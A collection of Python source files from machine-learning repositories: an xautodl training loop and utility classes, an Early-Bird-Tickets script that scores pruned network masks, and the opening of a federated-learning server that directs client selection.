param.data = param.data.to(device)
if param._grad is not None:
param._grad.data = param._grad.data.to(device)
elif isinstance(param, dict):
for subparam in param.values():
if isinstance(subparam, torch.Tensor):
subparam.data = subparam.data.to(device)
if subparam._grad is not None:
subparam._grad.data = subparam._grad.data.to(device)
def loss_fn(self, pred, label):
mask = ~torch.isnan(label)
if self.opt_config["loss"] == "mse":
return F.mse_loss(pred[mask], label[mask])
else:
            raise ValueError("unknown loss `{:}`".format(self.opt_config["loss"]))
def metric_fn(self, pred, label):
# the metric score : higher is better
if self.metric == "" or self.metric == "loss":
return -self.loss_fn(pred, label)
else:
raise ValueError("unknown metric `{:}`".format(self.metric))
def fit(
self,
dataset: DatasetH,
save_dir: Optional[Text] = None,
):
def _prepare_dataset(df_data):
return th_data.TensorDataset(
torch.from_numpy(df_data["feature"].values).float(),
torch.from_numpy(df_data["label"].values).squeeze().float(),
)
def _prepare_loader(dataset, shuffle):
return th_data.DataLoader(
dataset,
batch_size=self.opt_config["batch_size"],
drop_last=False,
pin_memory=True,
num_workers=self.opt_config["num_workers"],
shuffle=shuffle,
)
df_train, df_valid, df_test = dataset.prepare(
["train", "valid", "test"],
col_set=["feature", "label"],
data_key=DataHandlerLP.DK_L,
)
train_dataset, valid_dataset, test_dataset = (
_prepare_dataset(df_train),
_prepare_dataset(df_valid),
_prepare_dataset(df_test),
)
train_loader, valid_loader, test_loader = (
_prepare_loader(train_dataset, True),
_prepare_loader(valid_dataset, False),
_prepare_loader(test_dataset, False),
)
save_dir = get_or_create_path(save_dir, return_dir=True)
self.logger.info(
"Fit procedure for [{:}] with save path={:}".format(
self.__class__.__name__, save_dir
)
)
def _internal_test(ckp_epoch=None, results_dict=None):
with torch.no_grad():
shared_kwards = {
"model": self.model,
"loss_fn": self.loss_fn,
"metric_fn": self.metric_fn,
"is_train": False,
"optimizer": None,
"device": self.device,
}
train_loss, train_score = train_or_test_epoch(
train_loader, **shared_kwards
)
valid_loss, valid_score = train_or_test_epoch(
valid_loader, **shared_kwards
)
test_loss, test_score = train_or_test_epoch(
test_loader, **shared_kwards
)
xstr = (
"train-score={:.6f}, valid-score={:.6f}, test-score={:.6f}".format(
train_score, valid_score, test_score
)
)
if ckp_epoch is not None and isinstance(results_dict, dict):
results_dict["train"][ckp_epoch] = train_score
results_dict["valid"][ckp_epoch] = valid_score
results_dict["test"][ckp_epoch] = test_score
return dict(train=train_score, valid=valid_score, test=test_score), xstr
# Pre-fetch the potential checkpoints
ckp_path = os.path.join(save_dir, "{:}.pth".format(self.__class__.__name__))
if os.path.exists(ckp_path):
ckp_data = torch.load(ckp_path, map_location=self.device)
stop_steps, best_score, best_epoch = (
ckp_data["stop_steps"],
ckp_data["best_score"],
ckp_data["best_epoch"],
)
start_epoch, best_param = ckp_data["start_epoch"], ckp_data["best_param"]
results_dict = ckp_data["results_dict"]
self.model.load_state_dict(ckp_data["net_state_dict"])
self.train_optimizer.load_state_dict(ckp_data["opt_state_dict"])
self.logger.info("Resume from existing checkpoint: {:}".format(ckp_path))
else:
stop_steps, best_score, best_epoch = 0, -np.inf, -1
start_epoch, best_param = 0, None
results_dict = dict(
train=OrderedDict(), valid=OrderedDict(), test=OrderedDict()
)
_, eval_str = _internal_test(-1, results_dict)
self.logger.info(
"Training from scratch, metrics@start: {:}".format(eval_str)
)
for iepoch in range(start_epoch, self.opt_config["epochs"]):
self.logger.info(
"Epoch={:03d}/{:03d} ::==>> Best valid @{:03d} ({:.6f})".format(
iepoch, self.opt_config["epochs"], best_epoch, best_score
)
)
train_loss, train_score = train_or_test_epoch(
train_loader,
self.model,
self.loss_fn,
self.metric_fn,
True,
self.train_optimizer,
self.device,
)
self.logger.info(
"Training :: loss={:.6f}, score={:.6f}".format(train_loss, train_score)
)
current_eval_scores, eval_str = _internal_test(iepoch, results_dict)
self.logger.info("Evaluating :: {:}".format(eval_str))
if current_eval_scores["valid"] > best_score:
stop_steps, best_epoch, best_score = (
0,
iepoch,
current_eval_scores["valid"],
)
best_param = copy.deepcopy(self.model.state_dict())
else:
stop_steps += 1
if stop_steps >= self.opt_config["early_stop"]:
self.logger.info(
"early stop at {:}-th epoch, where the best is @{:}".format(
iepoch, best_epoch
)
)
break
save_info = dict(
net_config=self.net_config,
opt_config=self.opt_config,
net_state_dict=self.model.state_dict(),
opt_state_dict=self.train_optimizer.state_dict(),
best_param=best_param,
stop_steps=stop_steps,
best_score=best_score,
best_epoch=best_epoch,
results_dict=results_dict,
start_epoch=iepoch + 1,
)
torch.save(save_info, ckp_path)
self.logger.info(
"The best score: {:.6f} @ {:02d}-th epoch".format(best_score, best_epoch)
)
self.model.load_state_dict(best_param)
_, eval_str = _internal_test("final", results_dict)
self.logger.info("Reload the best parameter :: {:}".format(eval_str))
if self.use_gpu:
with torch.cuda.device(self.device):
torch.cuda.empty_cache()
self.fitted = True
def predict(self, dataset: DatasetH, segment: Union[Text, slice] = "test"):
if not self.fitted:
raise ValueError("The model is not fitted yet!")
x_test = dataset.prepare(
segment, col_set="feature", data_key=DataHandlerLP.DK_I
)
index = x_test.index
with torch.no_grad():
self.model.eval()
x_values = x_test.values
sample_num, batch_size = x_values.shape[0], self.opt_config["batch_size"]
preds = []
for begin in range(sample_num)[::batch_size]:
if sample_num - begin < batch_size:
end = sample_num
else:
end = begin + batch_size
x_batch = torch.from_numpy(x_values[begin:end]).float().to(self.device)
with torch.no_grad():
pred = self.model(x_batch).detach().cpu().numpy()
preds.append(pred)
return pd.Series(np.concatenate(preds), index=index)
```
#### File: xautodl/xlayers/super_utils.py
```python
import abc
import warnings
from typing import Optional, Union, Callable
import torch
import torch.nn as nn
from enum import Enum
from xautodl import spaces
IntSpaceType = Union[int, spaces.Integer, spaces.Categorical]
BoolSpaceType = Union[bool, spaces.Categorical]
class LayerOrder(Enum):
"""This class defines the enumerations for order of operation in a residual or normalization-based layer."""
PreNorm = "pre-norm"
PostNorm = "post-norm"
class SuperRunMode(Enum):
"""This class defines the enumerations for Super Model Running Mode."""
FullModel = "fullmodel"
Candidate = "candidate"
Default = "fullmodel"
class ShapeContainer:
"""A class to maintain the shape of each weight tensor for a model."""
def __init__(self):
self._names = []
self._shapes = []
self._name2index = dict()
self._param_or_buffers = []
@property
def shapes(self):
return self._shapes
def __getitem__(self, index):
return self._shapes[index]
def translate(self, tensors, all_none_match=True):
result = TensorContainer()
for index, name in enumerate(self._names):
cur_num = tensors[index].numel()
expected_num = self._shapes[index].numel()
if cur_num < expected_num or (
cur_num > expected_num and not all_none_match
):
raise ValueError("Invalid {:} vs {:}".format(cur_num, expected_num))
cur_tensor = tensors[index].view(-1)[:expected_num]
new_tensor = torch.reshape(cur_tensor, self._shapes[index])
result.append(name, new_tensor, self._param_or_buffers[index])
return result
def append(self, name, shape, param_or_buffer):
if not isinstance(shape, torch.Size):
raise TypeError(
"The input tensor must be torch.Size instead of {:}".format(type(shape))
)
self._names.append(name)
self._shapes.append(shape)
self._param_or_buffers.append(param_or_buffer)
assert name not in self._name2index, "The [{:}] has already been added.".format(
name
)
self._name2index[name] = len(self._names) - 1
def query(self, name):
if not self.has(name):
raise ValueError(
"The {:} is not in {:}".format(name, list(self._name2index.keys()))
)
index = self._name2index[name]
return self._shapes[index]
def has(self, name):
return name in self._name2index
def has_prefix(self, prefix):
for name, idx in self._name2index.items():
if name.startswith(prefix):
return name
return False
def numel(self, index=None):
if index is None:
shapes = self._shapes
else:
shapes = [self._shapes[index]]
total = 0
for shape in shapes:
total += shape.numel()
return total
def __len__(self):
return len(self._names)
def __repr__(self):
return "{name}({num} tensors)".format(
name=self.__class__.__name__, num=len(self)
)
class TensorContainer:
"""A class to maintain both parameters and buffers for a model."""
def __init__(self):
self._names = []
self._tensors = []
self._param_or_buffers = []
self._name2index = dict()
def additive(self, tensors):
result = TensorContainer()
for index, name in enumerate(self._names):
new_tensor = self._tensors[index] + tensors[index]
result.append(name, new_tensor, self._param_or_buffers[index])
return result
def create_container(self, tensors):
result = TensorContainer()
for index, name in enumerate(self._names):
new_tensor = tensors[index]
result.append(name, new_tensor, self._param_or_buffers[index])
return result
def no_grad_clone(self):
result = TensorContainer()
with torch.no_grad():
for index, name in enumerate(self._names):
result.append(
name, self._tensors[index].clone(), self._param_or_buffers[index]
)
return result
def to_shape_container(self):
result = ShapeContainer()
for index, name in enumerate(self._names):
result.append(
name, self._tensors[index].shape, self._param_or_buffers[index]
)
return result
def requires_grad_(self, requires_grad=True):
for tensor in self._tensors:
tensor.requires_grad_(requires_grad)
def parameters(self):
return self._tensors
@property
def tensors(self):
return self._tensors
def flatten(self, tensors=None):
if tensors is None:
tensors = self._tensors
tensors = [tensor.view(-1) for tensor in tensors]
return torch.cat(tensors)
def unflatten(self, tensor):
tensors, s = [], 0
for raw_tensor in self._tensors:
length = raw_tensor.numel()
x = torch.reshape(tensor[s : s + length], shape=raw_tensor.shape)
tensors.append(x)
s += length
return tensors
def append(self, name, tensor, param_or_buffer):
if not isinstance(tensor, torch.Tensor):
raise TypeError(
"The input tensor must be torch.Tensor instead of {:}".format(
type(tensor)
)
)
self._names.append(name)
self._tensors.append(tensor)
self._param_or_buffers.append(param_or_buffer)
assert name not in self._name2index, "The [{:}] has already been added.".format(
name
)
self._name2index[name] = len(self._names) - 1
def query(self, name):
if not self.has(name):
raise ValueError(
"The {:} is not in {:}".format(name, list(self._name2index.keys()))
)
index = self._name2index[name]
return self._tensors[index]
def has(self, name):
return name in self._name2index
def has_prefix(self, prefix):
for name, idx in self._name2index.items():
if name.startswith(prefix):
return name
return False
def numel(self):
total = 0
for tensor in self._tensors:
total += tensor.numel()
return total
def __len__(self):
return len(self._names)
def __repr__(self):
return "{name}({num} tensors)".format(
name=self.__class__.__name__, num=len(self)
)
```
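A minimal usage sketch (not part of the original file; the tensor names and shapes are made up): round-trip a couple of tensors through `TensorContainer.flatten` / `unflatten`.
```python
import torch

container = TensorContainer()
container.append("weight", torch.randn(4, 3), True)  # True marks it as a parameter
container.append("bias", torch.zeros(4), True)

flat = container.flatten()             # single 1-D tensor of 16 elements
restored = container.unflatten(flat)   # list of tensors with the original shapes
print(flat.shape, [t.shape for t in restored])
# torch.Size([16]) [torch.Size([4, 3]), torch.Size([4])]
```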
#### File: xautodl/xmisc/__init__.py
```python
from .module_utils import call_by_dict
from .module_utils import call_by_yaml
from .module_utils import nested_call_by_dict
from .module_utils import nested_call_by_yaml
from .yaml_utils import load_yaml
from .torch_utils import count_parameters
from .logger_utils import Logger
"""The data sampler related classes."""
from .sampler_utils import BatchSampler
"""The meter related classes."""
from .meter_utils import AverageMeter
"""The scheduler related classes."""
from .scheduler_utils import CosineParamScheduler, WarmupParamScheduler, LRMultiplier
def get_scheduler(indicator, lr):
if indicator == "warm-cos":
multiplier = WarmupParamScheduler(
CosineParamScheduler(lr, lr * 1e-3),
warmup_factor=0.001,
warmup_length=0.05,
warmup_method="linear",
)
else:
raise ValueError("Unknown indicator: {:}".format(indicator))
return multiplier
```
#### File: xautodl/xmisc/logger_utils.py
```python
import sys
from pathlib import Path
from .time_utils import time_for_file, time_string
class Logger:
"""A logger used in xautodl."""
def __init__(self, root_dir, prefix="", log_time=True):
"""Create a summary writer logging to log_dir."""
self.root_dir = Path(root_dir)
self.log_dir = self.root_dir / "logs"
self.log_dir.mkdir(parents=True, exist_ok=True)
self._prefix = prefix
self._log_time = log_time
self.logger_path = self.log_dir / "{:}{:}.log".format(
self._prefix, time_for_file()
)
self._logger_file = open(self.logger_path, "w")
@property
def logger(self):
return self._logger_file
def log(self, string, save=True, stdout=False):
string = "{:} {:}".format(time_string(), string) if self._log_time else string
if stdout:
sys.stdout.write(string)
sys.stdout.flush()
else:
print(string)
if save:
self._logger_file.write("{:}\n".format(string))
self._logger_file.flush()
def close(self):
self._logger_file.close()
        if getattr(self, "writer", None) is not None:
self.writer.close()
def __repr__(self):
return "{name}(dir={log_dir}, prefix={_prefix}, log_time={_log_time})".format(
name=self.__class__.__name__, **self.__dict__
)
```
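A minimal usage sketch (not part of the original file; the directory and prefix are made up, and it assumes `time_utils` from the same package is importable): create a `Logger`, write one line, and close it.
```python
logger = Logger("/tmp/xautodl-demo", prefix="demo-")
logger.log("hello from the logger", save=True, stdout=False)  # printed and written to the log file
logger.close()
```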
#### File: xautodl/xmisc/torch_utils.py
```python
import torch
import torch.nn as nn
import numpy as np
def count_parameters(model_or_parameters, unit="mb"):
if isinstance(model_or_parameters, nn.Module):
counts = sum(np.prod(v.size()) for v in model_or_parameters.parameters())
elif isinstance(model_or_parameters, nn.Parameter):
        counts = model_or_parameters.numel()
elif isinstance(model_or_parameters, (list, tuple)):
        counts = sum(count_parameters(x, None) for x in model_or_parameters)
else:
counts = sum(np.prod(v.size()) for v in model_or_parameters)
    if unit is None:
        pass
    elif unit.lower() == "kb" or unit.lower() == "k":
        counts /= 1e3
    elif unit.lower() == "mb" or unit.lower() == "m":
        counts /= 1e6
    elif unit.lower() == "gb" or unit.lower() == "g":
        counts /= 1e9
    else:
        raise ValueError("Unknown unit: {:}".format(unit))
    return counts
```
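A minimal usage sketch (not part of the original file; the toy model is made up): count the parameters of a small module in different units. Note that `"mb"` here means millions of parameters, not megabytes.
```python
import torch.nn as nn

model = nn.Linear(100, 10)            # 100*10 weights + 10 biases = 1010 parameters
print(count_parameters(model, "mb"))  # 0.00101
print(count_parameters(model, "k"))   # 1.01
```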
#### File: xautodl/xmisc/yaml_utils.py
```python
import os
import yaml
def load_yaml(path):
if not os.path.isfile(path):
raise ValueError("{:} is not a file.".format(path))
with open(path, "r") as stream:
data = yaml.safe_load(stream)
return data
```
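A minimal usage sketch (not part of the original file; the path is made up): write a tiny YAML file and read it back with `load_yaml`.
```python
with open("/tmp/example.yaml", "w") as stream:
    stream.write("lr: 0.1\nepochs: 200\n")
print(load_yaml("/tmp/example.yaml"))  # {'lr': 0.1, 'epochs': 200}
```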
#### File: xautodl/xmodels/transformers_quantum.py
```python
import copy, math
from functools import partial
from typing import Optional, Text, List
import torch
import torch.nn as nn
import torch.nn.functional as F
from xautodl import spaces
from xautodl import xlayers
from xautodl.xlayers import weight_init
class SuperQuaT(xlayers.SuperModule):
"""The super transformer for transformer."""
def __init__(
self,
image_size,
patch_size,
num_classes,
dim,
depth,
heads,
mlp_multiplier=4,
channels=3,
dropout=0.0,
att_dropout=0.0,
):
super(SuperQuaT, self).__init__()
image_height, image_width = pair(image_size)
patch_height, patch_width = pair(patch_size)
if image_height % patch_height != 0 or image_width % patch_width != 0:
raise ValueError("Image dimensions must be divisible by the patch size.")
num_patches = (image_height // patch_height) * (image_width // patch_width)
patch_dim = channels * patch_height * patch_width
self.to_patch_embedding = xlayers.SuperSequential(
xlayers.SuperReArrange(
"b c (h p1) (w p2) -> b (h w) (p1 p2 c)",
p1=patch_height,
p2=patch_width,
),
xlayers.SuperLinear(patch_dim, dim),
)
self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim))
self.cls_token = nn.Parameter(torch.randn(1, 1, dim))
self.dropout = nn.Dropout(dropout)
# build the transformer encode layers
layers = []
for ilayer in range(depth):
layers.append(
xlayers.SuperTransformerEncoderLayer(
dim,
heads,
False,
mlp_multiplier,
dropout=dropout,
att_dropout=att_dropout,
)
)
self.backbone = xlayers.SuperSequential(*layers)
self.cls_head = xlayers.SuperSequential(
xlayers.SuperLayerNorm1D(dim), xlayers.SuperLinear(dim, num_classes)
)
weight_init.trunc_normal_(self.cls_token, std=0.02)
self.apply(_init_weights)
@property
def abstract_search_space(self):
raise NotImplementedError
def apply_candidate(self, abstract_child: spaces.VirtualNode):
super(SuperQuaT, self).apply_candidate(abstract_child)
raise NotImplementedError
def forward_candidate(self, input: torch.Tensor) -> torch.Tensor:
raise NotImplementedError
def forward_raw(self, input: torch.Tensor) -> torch.Tensor:
tensors = self.to_patch_embedding(input)
batch, seq, _ = tensors.shape
cls_tokens = self.cls_token.expand(batch, -1, -1)
feats = torch.cat((cls_tokens, tensors), dim=1)
feats = feats + self.pos_embedding[:, : seq + 1, :]
feats = self.dropout(feats)
feats = self.backbone(feats)
x = feats[:, 0] # the features for cls-token
return self.cls_head(x)
def get_transformer(config):
if isinstance(config, str) and config.lower() in name2config:
config = name2config[config.lower()]
if not isinstance(config, dict):
raise ValueError("Invalid Configuration: {:}".format(config))
model_type = config.get("type", "vit").lower()
if model_type == "vit":
model = SuperQuaT(
image_size=config.get("image_size"),
patch_size=config.get("patch_size"),
num_classes=config.get("num_classes"),
dim=config.get("dim"),
depth=config.get("depth"),
heads=config.get("heads"),
dropout=config.get("dropout"),
att_dropout=config.get("att_dropout"),
)
else:
raise ValueError("Unknown model type: {:}".format(model_type))
return model
``` |
{
"source": "Joey61Liuyi/Early-Bird-Tickets",
"score": 2
} |
#### File: Joey61Liuyi/Early-Bird-Tickets/score_prove.py
```python
import argparse
import random
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
from torchvision import datasets, transforms
import wandb
# from models import *
import models
# os.environ['CUDA_VISIBLE_DEVICES'] = '4'
import copy
from score_based_pruning import reset_seed
from model_complexity import get_model_infos
def check_score(model, train_loader):
test_batch_size = 128
newmodel = copy.deepcopy(model)
reset_seed()
newmodel.K = np.zeros((test_batch_size, test_batch_size))
def counting_forward_hook(module, inp, out):
try:
if not module.visited_backwards:
return
if isinstance(inp, tuple):
inp = inp[0]
inp = inp.view(inp.size(0), -1)
x = (inp > 0).float()
K = x @ x.t()
K2 = (1. - x) @ (1. - x.t())
newmodel.K = newmodel.K + K.cpu().numpy() + K2.cpu().numpy()
except:
pass
def counting_backward_hook(module, inp, out):
module.visited_backwards = True
for name, module in newmodel.named_modules():
if 'ReLU' in str(type(module)):
# hooks[name] = module.register_forward_hook(counting_hook)
module.register_forward_hook(counting_forward_hook)
module.register_backward_hook(counting_backward_hook)
newmodel = newmodel.to(device)
s = []
for j in range(5):
data_iterator = iter(train_loader)
x, target = next(data_iterator)
x2 = torch.clone(x)
x2 = x2.to(device)
x, target = x.to(device), target.to(device)
jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device)
newmodel(x2.to(device))
s_, ld = np.linalg.slogdet(newmodel.K)
s.append(ld)
score = np.mean(s)
return score
# Prune settings
parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune')
parser.add_argument('--dataset', type=str, default='cifar100',
help='training dataset (default: cifar10)')
parser.add_argument('--test-batch-size', type=int, default=128, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--depth', type=int, default=16,
help='depth of the vgg')
parser.add_argument('--percent', type=float, default=0.5,
help='scale sparse rate (default: 0.5)')
parser.add_argument('--model', default='', type=str, metavar='PATH',
help='path to the model (default: none)')
parser.add_argument('--save', default='./baseline/vgg16-cifar100', type=str, metavar='PATH',
help='path to save pruned model (default: none)')
parser.add_argument('--save_1', default='./baseline/vgg16-cifar100', type=str, metavar='PATH',
help='path to save pruned model (default: none)')
parser.add_argument('--start_epoch', default=1, type=int, metavar='N', help='manual start epoch number')
parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number')
# quantized parameters
parser.add_argument('--bits_A', default=8, type=int, help='input quantization bits')
parser.add_argument('--bits_W', default=8, type=int, help='weight quantization bits')
parser.add_argument('--bits_G', default=8, type=int, help='gradient quantization bits')
parser.add_argument('--bits_E', default=8, type=int, help='error quantization bits')
parser.add_argument('--bits_R', default=16, type=int, help='rand number quantization bits')
parser.add_argument('--arch', default='vgg', type=str,
help='architecture to use')
# multi-gpus
parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
seed = 1
if not os.path.exists(args.save):
os.makedirs(args.save)
gpu = args.gpu_ids
gpu_ids = args.gpu_ids.split(',')
args.gpu_ids = []
for gpu_id in gpu_ids:
id = int(gpu_id)
if id > 0:
args.gpu_ids.append(id)
if len(args.gpu_ids) > 0:
torch.cuda.set_device(args.gpu_ids[0])
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def get_batch_jacobian(net, x, target, device):
net.zero_grad()
x.requires_grad_(True)
y = net(x)
y.backward(torch.ones_like(y))
jacob = x.grad.detach()
return jacob, target.detach(), y.detach()
if args.arch.endswith('lp'):
# model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth)
model = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth)
elif args.dataset == 'imagenet':
model = models.__dict__[args.arch](pretrained=False)
if len(args.gpu_ids) > 1:
model = torch.nn.DataParallel(model, device_ids=args.gpu_ids)
else:
model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth)
if args.dataset == 'cifar10':
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./data.cifar10', train=True, download=True,
transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
else:
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./data.cifar100', train=True, download=True,
transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
])),
batch_size=args.test_batch_size, shuffle=True)
def create_model(model, cfg, cfg_mask):
if args.arch.endswith('lp'):
# model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth)
newmodel = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth)
elif args.dataset == 'imagenet':
newmodel = models.__dict__[args.arch](pretrained=False)
if len(args.gpu_ids) > 1:
model = torch.nn.DataParallel(model, device_ids=args.gpu_ids)
else:
newmodel = models.__dict__[args.arch](dataset=args.dataset, cfg = cfg)
layer_id_in_cfg = 0
start_mask = torch.ones(3)
end_mask = cfg_mask[layer_id_in_cfg]
for [m0, m1] in zip(model.modules(), newmodel.modules()):
if isinstance(m0, nn.BatchNorm2d):
if torch.sum(end_mask) == 0:
continue
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask.cpu().numpy())))
if idx1.size == 1:
idx1 = np.resize(idx1, (1,))
m1.weight.data = m0.weight.data[idx1.tolist()].clone()
m1.bias.data = m0.bias.data[idx1.tolist()].clone()
m1.running_mean = m0.running_mean[idx1.tolist()].clone()
m1.running_var = m0.running_var[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask.clone()
if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC
end_mask = cfg_mask[layer_id_in_cfg]
elif isinstance(m0, nn.Conv2d):
if torch.sum(end_mask) == 0:
continue
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask.cpu().numpy())))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask.cpu().numpy())))
# random set for test
# new_end_mask = np.asarray(end_mask.cpu().numpy())
# new_end_mask = np.append(new_end_mask[int(len(new_end_mask)/2):], new_end_mask[:int(len(new_end_mask)/2)])
# idx1 = np.squeeze(np.argwhere(new_end_mask))
# print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
if idx0.size == 1:
idx0 = np.resize(idx0, (1,))
if idx1.size == 1:
idx1 = np.resize(idx1, (1,))
w1 = m0.weight.data[:, idx0.tolist(), :, :].clone()
w1 = w1[idx1.tolist(), :, :, :].clone()
m1.weight.data = w1.clone()
elif isinstance(m0, nn.Linear):
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask.cpu().numpy())))
if idx0.size == 1:
idx0 = np.resize(idx0, (1,))
m1.weight.data = m0.weight.data[:, idx0].clone()
m1.bias.data = m0.bias.data.clone()
return newmodel
#
# def check_score(newmodel, train_loader):
#
# newmodel.K = np.zeros((args.test_batch_size, args.test_batch_size))
# def counting_forward_hook(module, inp, out):
# try:
# if not module.visited_backwards:
# return
# if isinstance(inp, tuple):
# inp = inp[0]
# inp = inp.view(inp.size(0), -1)
# x = (inp > 0).float()
# K = x @ x.t()
# K2 = (1. - x) @ (1. - x.t())
# newmodel.K = newmodel.K + K.cpu().numpy() + K2.cpu().numpy()
# except:
# pass
#
# def counting_backward_hook(module, inp, out):
# module.visited_backwards = True
#
# for name, module in newmodel.named_modules():
# if 'ReLU' in str(type(module)):
# # hooks[name] = module.register_forward_hook(counting_hook)
# module.register_forward_hook(counting_forward_hook)
# module.register_backward_hook(counting_backward_hook)
#
# newmodel = newmodel.to(device)
# s = []
#
# for j in range(5):
# data_iterator = iter(train_loader)
# x, target = next(data_iterator)
# x2 = torch.clone(x)
# x2 = x2.to(device)
# x, target = x.to(device), target.to(device)
# jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device)
# newmodel(x2.to(device))
# s_, ld = np.linalg.slogdet(newmodel.K)
# s.append(ld)
# score = np.mean(s)
# return score
if args.cuda:
model.cuda()
def pruning(model):
total = 0
cfg = []
cfg_mask = []
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
total += m.weight.data.shape[0]
bn = torch.zeros(total)
index = 0
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
size = m.weight.data.shape[0]
bn[index:(index+size)] = m.weight.data.abs().clone()
index += size
y, i = torch.sort(bn)
thre_index = int(total * args.percent)
thre = y[thre_index]
# print('Pruning threshold: {}'.format(thre))
mask = torch.zeros(total)
index = 0
for k, m in enumerate(model.modules()):
if isinstance(m, nn.BatchNorm2d):
size = m.weight.data.numel()
weight_copy = m.weight.data.abs().clone()
_mask = weight_copy.gt(thre.cuda()).float().cuda()
cfg_mask.append(_mask.clone())
if int(torch.sum(_mask)) > 0:
cfg.append(int(torch.sum(_mask)))
mask[index:(index+size)] = _mask.view(-1)
# print('layer index: {:d} \t total channel: {:d} \t remaining channel: {:d}'.format(k, _mask.shape[0], int(torch.sum(_mask))))
index += size
elif isinstance(m, nn.MaxPool2d):
cfg.append('M')
# print('Pre-processing Successful!')
return mask, cfg, cfg_mask
resume = args.save + '/model_best.pth.tar'
print('==> resuming from model_best ...')
checkpoint = torch.load(resume)
best_epoch = checkpoint['epoch']
print('best epoch: ', best_epoch)
model.load_state_dict(checkpoint['state_dict'])
best_mask, best_cfg, best_mask_cfg = pruning(model)
size = best_mask.size(0)
# resume = args.save_1 + '/model_best.pth.tar'
# resume = args.save_1 + '/ckpt159.pth.tar'
# print('==> resumeing from model_best ...')
# checkpoint = torch.load(resume)
# best_epoch = checkpoint['epoch']
# print('best epoch: ', best_epoch)
# model.load_state_dict(checkpoint['state_dict'])
# best_mask_1 = pruning(model)
# print('overlap rate of two best model: ', float(torch.sum(best_mask==best_mask_1)) / size)
epochs = args.end_epoch - args.start_epoch + 1
overlap = np.zeros((epochs, epochs))
save_dir = os.path.join(args.save, 'overlap_'+str(args.percent))
masks = []
for i in range(args.start_epoch, args.end_epoch+1):
resume = args.save + '/ckpt' + str(i-1) + '.pth.tar'
checkpoint = torch.load(resume)
model.load_state_dict(checkpoint['state_dict'])
masks.append(pruning(model))
# for i in range(args.start_epoch, args.end_epoch+1):
# for j in range(args.start_epoch, args.end_epoch+1):
# overlap[i-1, j-1] = float(torch.sum(masks[i-1] == masks[j-1])) / size
# print('overlap[{}, {}] = {}'.format(i-1, j-1, overlap[i-1, j-1]))
#
# np.save(save_dir, overlap)
wandb_project = 'pruning_score'
name = 'trail'
# wandb.init(project=wandb_project, name=name)
best_info = {}
best_score = 0
bird = [15, 25, 40, 159]
xshape = (1, 3, 32, 32)
flops_original, param_origianl = get_model_infos(model, xshape)
for i in range(args.start_epoch, args.end_epoch):
model_new = create_model(model, masks[i][1], masks[i][2])
score = check_score(model_new, train_loader)
flop, param = get_model_infos(model_new, xshape)
info_dict = {
'epoch': i,
'score': score,
'cfg': masks[i][1],
'cfg_mask': masks[i][2],
'flop_pruning_rate': flop/flops_original,
'param_pruning_rate': param/param_origianl,
}
# wandb.log(info_dict)
print(score)
if score > best_score:
best_score = score
best_info = info_dict
if i in bird:
print(i, flop/flops_original, param/param_origianl, score)
np.save('{}-{:.2f}.npy'.format(i, best_score), info_dict)
``` |
{
"source": "Joey61Liuyi/flsim",
"score": 3
} |
#### File: flsim/server/directed.py
```python
import logging
from server import Server
import numpy as np
from threading import Thread
class DirectedServer(Server):
"""Federated learning server that uses profiles to direct during selection."""
# Run federated learning
def run(self):
# Perform profiling on all clients
self.profiling()
# Continue federated learning
super().run()
# Federated learning phases
def selection(self):
import fl_model # pylint: disable=import-error
clients = self.clients
clients_per_round = self.config.clients.per_round
profiles = self.profiles
w_previous = self.w_previous
# Extract directors from profiles
directors = [d for _, d in profiles]
# Extract most recent model weights
w_current = self.flatten_weights(fl_model.extract_weights(self.model))
model_direction = w_current - w_previous
# Normalize model direction
model_direction = model_direction / \
np.sqrt(np.dot(model_direction, model_direction))
# Update previous model weights
self.w_previous = w_current
# Generate client director scores (closer direction is better)
scores = [np.dot(director, model_direction) for director in directors]
